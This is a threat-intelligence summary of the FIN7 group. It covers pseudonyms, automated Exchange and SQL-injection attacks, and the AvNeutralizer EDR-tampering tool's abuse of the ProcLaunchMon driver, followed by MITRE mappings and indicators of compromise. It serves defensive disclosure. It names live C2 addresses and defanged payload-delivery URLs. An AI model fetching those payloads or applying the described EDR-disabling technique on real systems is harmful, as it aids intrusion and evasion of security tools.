FIN7 continues to evolve its operations with multiple pseudonyms, automated SQL injection campaigns, and a growing toolkit including AvNeutralizer to tamper with security solutions. A new AvNeutralizer variant leverages the Windows ProcLaunchMon driver to disrupt protected processes, signaling an advanced EDR-evasion capability shift.
#FIN7 #AvNeutralizer #AuKill #Powertrash #Diceloader #IceBot #CoreImpact #Checkmarks #BlackBasta #Stupor
#FIN7 #AvNeutralizer #AuKill #Powertrash #Diceloader #IceBot #CoreImpact #Checkmarks #BlackBasta #Stupor
Keypoints
- FIN7 is masking its identity with multiple pseudonyms to sustain underground operations.
- Automated SQL injection campaigns targeting public-facing apps are a notable FIN7 tactic (Checkmarks system).
- AvNeutralizer (AuKill) is a specialized EDR-tampering tool marketed in underground forums and used by multiple ransomware groups.
- A new AvNeutralizer version uses a previously unseen technique to tamper with protected processes, employing the ProcLaunchMon driver.
- FIN7’s arsenal includes Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer to cover multiple attack phases.
- FIN7 exploits staging servers and Powertrash loaders to deliver Core Impact and Diceloader payloads, with persistence via SSH-based backdoors and reverse SSH tunnels for exfiltration.
MITRE Techniques
- [T1562.001] Impair Defenses – AvNeutralizer tampering with security solutions. Bracket content: ‘the updated version implements previously unseen techniques to tamper with some specific implementations of protected processes.’
- [T1190] Exploit Public-Facing Application – Checkmarks automated attack system primarily aimed at exploiting public-facing Microsoft Exchange servers. Bracket content: ‘Checkmarks platform, developed by the FIN7 group as an automated attack system … exploiting public-facing Microsoft Exchange servers.’
- [T1055.012] Process Injection – Reflective loading in memory (ReflectiveLoader) to run modules without dropping to disk. Bracket content: ‘loading them directly in memory and sending the output back to the attacker through an encrypted channel.’
- [T1059.001] PowerShell – Powertrash droppers with multi-layer obfuscation delivering payloads. Bracket content: ‘Observed exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately leading to the final URL that downloads and executes the implant.’
- [T1499] Endpoint Denial of Service – New technique to disable endpoint security solutions using ProcLaunchMon.sys to cause a DoS in protected processes. Bracket content: ‘to create a DoS condition in some protected processes implementations …’
- [T1053.005] Scheduled Task – Persistence via a scheduled task so it can survive reboots. Bracket content: ‘configured as a scheduled task so it can survive reboots.’
- [T1041] Exfiltration Over C2 Channel – SSH-based backdoor creates a reverse SSH tunnel to stealthily exfiltrate files. Bracket content: ‘the reverse tunnel is configured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files from the compromised machine at any time.’
- [T1105] Ingress Tool Transfer – Powertrash loaders pulled from staging servers to deliver backdoors (Core Impact, Diceloader). Bracket content: ‘Powertrash loaders delivering Core Impact implants …’
Indicators of Compromise
- [SHA1] Powertrash variants – 05e9e0005fd38a0f168757637c1719d6303bfbac, 343f15cd30791d8d9809ac471bcd39eee0ae09e2
- [SHA1] Core Impact PIC – 0b4974c0d0802f6b8befae8d89abba4593756dfa, 1693ec86bb6de6e0fe64f57484e1ce97bf373081
- [SHA1] AvNeutralizer packed version – 15186e9d03600c667bbe4b34c5e1348bfc0a8168, cc17f8dd1ed74955a9c4d8b5a766ef6a2fa6807d
- [SHA1] AvNeutralizer ordinary variants – 07d0c0c315f99c4f1785645ddd4c3fe665c0448c, 187546da3f90d17329dd999ea481c3ebe3f99845
- [IP Address] FIN7 staging/command and control – 193.178.210.227, 45.87.154.208
- [IP Address] Core Impact C2 – 37.157.254.8, 213.109.192.198
- [IP Address] Diceloader C2 – 194.180.174.86, 91.199.147.152
- [URL] Powertrash/Core Impact payload delivery – hxxp://193.178.210[.]227/work_53.bin_m7.ps1, hxxp://45.87.154[.]208/work_53m8.ps1
- [URL] Diceloader payload delivery – hxxp://45.87.154[.]208/icsnd3b_64refl.ps1
- [File Name] AvNeutralizer userland components – AVDieSe.exe, AVDieSophos.exe
- [Driver/File] ProcLaunchMon.sys (TTD Monitor Driver) – DoS technique context